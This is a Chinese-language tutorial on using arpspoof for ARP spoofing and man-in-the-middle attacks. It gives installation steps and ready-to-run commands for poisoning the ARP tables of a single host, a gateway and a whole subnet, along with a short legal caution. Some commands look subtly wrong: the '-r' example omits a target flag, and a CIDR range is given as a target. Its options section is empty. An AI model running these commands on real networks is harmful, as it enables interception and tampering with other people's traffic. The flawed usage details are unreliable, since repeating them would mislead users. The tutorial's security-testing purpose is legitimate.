一、简介

arpspoof 是一款用于 ARP 欺骗的工具，能够发送伪造的 ARP 数据包，欺骗网络中的设备，使其将攻击者的设备误认为是目标设备。这通常用于中间人攻击（MITM），例如捕获网络流量或篡改数据。

二、安装

（一）Kali Linux

arpspoof 在 Kali Linux 中通常已经预装。如果没有安装，可以通过安装 dsniff 包来获取：

1
2

sudo apt-get update
sudo apt-get install dsniff

（二）Ubuntu

在 Ubuntu 上，arpspoof 也包含在 dsniff 包中：

1
2

sudo apt-get update
sudo apt-get install dsniff

（三）CentOS

在 CentOS 上，可以通过安装 dsniff 包来获取 arpspoof：

1
2

sudo yum install epel-release
sudo yum install dsniff

安装完成后，可以通过以下命令验证 arpspoof 是否安装成功：

1

arpspoof --help

三、基本语法

1

arpspoof [选项] [目标 IP]

四、常用选项

五、使用示例

（一）欺骗单个目标

1

sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

将目标主机（192.168.1.100）的 ARP 表项中的默认网关（192.168.1.1）指向攻击者的设备。

（二）自动欺骗网关

1

sudo arpspoof -i eth0 -r 192.168.1.100

自动将目标主机（192.168.1.100）的 ARP 表项中的默认网关指向攻击者的设备。

（三）欺骗整个网络

1

sudo arpspoof -i eth0 -t 192.168.1.0/24 192.168.1.1

将整个网络中的设备的 ARP 表项中的默认网关指向攻击者的设备。

（四）恢复 ARP 表项

1

sudo arpspoof -i eth0 -c both -t 192.168.1.100 192.168.1.1

恢复目标主机（192.168.1.100）的 ARP 表项，使其恢复正常。

六、注意事项

1. 权限问题：arpspoof 需要管理员权限才能运行。
2. 网络环境：某些网络环境可能检测到 ARP 欺骗行为并采取措施。
3. 法律问题：未经授权的 ARP 欺骗行为可能违反法律法规。
4. 网络拓扑：在复杂的网络环境中，可能需要调整攻击策略以确保有效欺骗。
5. 工具替代：如果 arpspoof 不可用，可以使用其他工具（如 ettercap 或 bettercap）来实现类似功能。

七、总结

arpspoof 是一个功能强大的 ARP 欺骗工具，常用于中间人攻击（MITM）。通过掌握基本语法和高级用法，可以快速实现网络流量的捕获和篡改，帮助进行网络安全测试和分析。